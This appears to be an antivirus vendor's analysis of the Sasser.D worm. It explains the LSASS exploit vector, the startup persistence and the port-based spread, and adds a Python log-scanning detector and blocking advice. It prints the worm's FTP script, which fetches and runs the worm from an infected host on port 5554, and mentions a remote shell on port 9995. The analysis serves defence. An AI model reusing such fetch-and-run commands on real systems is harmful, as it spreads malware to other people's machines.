W32/Sasser.D!worm
Analysis
Specifics
This 32-bit virus is a minor variant of W32/Sasser.C-net: it also has a packed file size of 16,384 bytes and was coded using Visual C++. The main difference between this variant and the rest of the family is its lack of support for Windows 2000, which limits the spread of this variant to Windows XP systems only.
The only intention of this virus is to spread to other systems across the Internet, and quickly. This threat exploits a buffer overflow vulnerability in the Local Security Authority Subsystem Service (LSASS) [ref: MS04-011, CAN-2003-0533].
The buffer overrun exists because of an unchecked buffer in the Local Security Authority Subsystem Service. This service is responsible for managing local security, domain authentication, and Active Directory processes. It handles authentication for the client and for the server. It also contains features that are used to support Active Directory utilities.
The virus will bind to TCP port 5554 and act as an FTP server. The virus will then send SYN packets to random IP addresses across the Internet on destination TCP port 445. IP addresses which are live will respond with an "ACK" packet. The virus will then target that IP address by launching its LSASS exploit code in an effort to gain access to that system. If the target can be compromised, the virus will write into the IPC$ share an FTP script file which will request the virus from the infected system. The virus is downloaded from the infected system's TCP port 5554 to the target. The file received will then be executed, and the cycle will continue.
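The propagation pattern described above (a SYN sweep of random hosts on TCP/445, followed by the victim fetching the worm from the infected host's FTP server on TCP/5554 and a shell on TCP/9995) can be spotted in firewall connection logs. The following script is an added illustration, not part of Fortinet's analysis; the log line format ("src dst dport proto"), the sample lines and the sweep threshold are all constructed assumptions.

```python
"""Flag Sasser.D-style activity in firewall connection logs.

Added example, not from the original analysis. The log format (one
'src dst dport proto' record per line) and the threshold are assumptions.
"""
from collections import defaultdict

# Ports from the analysis: 445 (LSASS exploit target), 5554 (worm FTP
# server on the infected host), 9995 (remote shell opened on the victim).
WORM_PORTS = {5554: "worm FTP server", 9995: "remote shell"}
SCAN_THRESHOLD = 20  # distinct destinations on TCP/445 per source (assumed)


def parse_line(line):
    src, dst, dport, proto = line.split()
    return src, dst, int(dport), proto.upper()


def analyze(lines, threshold=SCAN_THRESHOLD):
    """Return (sources sweeping TCP/445, connections on worm ports)."""
    targets_445 = defaultdict(set)
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        src, dst, dport, proto = parse_line(line)
        if proto != "TCP":
            continue
        if dport == 445:
            targets_445[src].add(dst)  # count distinct hosts probed, not packets
        elif dport in WORM_PORTS:
            findings.append((src, dst, dport, WORM_PORTS[dport]))
    scanners = sorted(s for s, t in targets_445.items() if len(t) >= threshold)
    return scanners, findings


# Constructed sample: 10.0.0.5 sweeps 25 hosts on 445, then one victim pulls
# the worm from its port 5554 and gets a shell on 9995; 10.0.0.9 is normal SMB.
SAMPLE = [f"10.0.0.5 192.0.2.{i} 445 tcp" for i in range(1, 26)]
SAMPLE += ["10.0.0.9 10.0.0.10 445 tcp", "10.0.0.9 10.0.0.11 445 tcp",
           "192.0.2.7 10.0.0.5 5554 tcp", "10.0.0.5 192.0.2.7 9995 tcp"]

if __name__ == "__main__":
    scanners, hits = analyze(SAMPLE)
    for s in scanners:
        print(f"possible LSASS sweep from {s}")
    for src, dst, port, why in hits:
        print(f"{src} -> {dst}:{port} ({why})")
```

Ordinary file-server traffic (a few SMB peers per host) stays under the threshold, while a host probing many distinct addresses on 445 or any connection on 5554/9995 is reported.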
Loading At Windows Startup
If this virus is run, it will copy itself to the Windows folder and register itself to run at each Windows startup -
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
"skynetave.exe" = C:\WINNT\skynetave.exe
The virus is also referenced by the Mutex "Jobaka3".
Virus Delivery Through FTP
On an infected system, the virus may write files with random names that follow a specific format into the System32 folder, such as these -
98723_up.exe
23712_up.exe
56919_up.exe
The virus will bind to TCP port 5554 and use this channel to operate an FTP emulation. The virus creates a file "c:\win2.log" and writes the infected system IP address into this file. If the virus is able to compromise a target, it will open a remote shell on the target on TCP port 9995. Next the virus will write an FTP script file as "cmd.ftp" with the following instructions -
open <IP address of infected system> 5554
anonymous
user
bin
get #####_up.exe
bye
In the above instructions, ##### represents the actual file name which is stored on the infected host. The virus remotely executes the FTP script using the instruction "ftp -s:cmd.ftp". When the file is retrieved to the target system, it is then executed and the "cmd.ftp" script is then deleted.
Recommended Action
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
- Using the FortiGate manager, block internal to external traffic using UDP ports 135, 137, 138, and 445, and TCP ports 135, 139, 445, 593, 5554 and 9995
- For Windows XP users, enable the Personal Firewall - this feature automatically blocks unsolicited inbound traffic and would protect against this Internet worm
- Ensure affected systems are updated with the latest Microsoft security patches, and specifically the update which addresses this vulnerability in MS04-011
Telemetry
Detection Availability
FortiClient | Extreme
FortiMail | Extreme
FortiSandbox | Extreme
FortiWeb | Extreme
Web Application Firewall | Extreme
FortiIsolator | Extreme
FortiDeceptor | Extreme
FortiEDR |